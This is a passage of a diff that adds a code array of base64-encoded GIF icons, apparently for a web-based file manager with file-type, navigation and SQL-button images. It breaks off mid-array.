+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
+"download"=>
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
+"forward"=>
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
+"WqsJADs=",
+"home"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
+"mode"=>
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
+"refresh"=>
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".
+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",
+"search"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
+"setup"=>
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
+"small_dir"=>
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+"small_unk"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
+"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
+"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
+"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
+"yAsokBkQADs=",
+"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
+"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
+"sort_asc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
+"sort_desc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
+"sql_button_drop"=>
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
+"AQEAOw==",
+"sql_button_empty"=>
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
+"sql_button_insert"=>
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
+"up"=>
+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
+"write"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"ext_asp"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
+"ext_mp3"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_avi"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7",
+"ext_cgi"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".
+"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".
+"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".
+"RYtMAgEAOw==",
+"ext_cmd"=>
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
+"dmrYAMn1onq/YKpjvEgAADs=",
+"ext_cpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
+"Eq7YrLDE7a4SADs=",
+"ext_ini"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
+"SnEjgPVarHEHgrB43JvszsQEADs=",
+"ext_diz"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
+"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
+"Ow==",
+"ext_doc"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
+"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
+"ext_exe"=>
+"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
+"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
+"xhIAOw==",
+"ext_h"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
+"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
+"Wq/NknbbSgAAOw==",
+"ext_hpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
+"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
+"UqUagnbLdZa+YFcCADs=",
+"ext_htaccess"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
+"AAA7",
+"ext_html"=>
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
+"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
+"ADs=",
+"ext_jpg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_js"=>
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
+"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
+"a00AjYYBbc/o9HjNniUAADs=",
+"ext_lnk"=>
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
+"ADs=",
+"ext_log"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
+"ext_php"=>
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".
+"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",
+"ext_pl"=>
+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
+"ext_swf"=>
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
+"ext_tar"=>
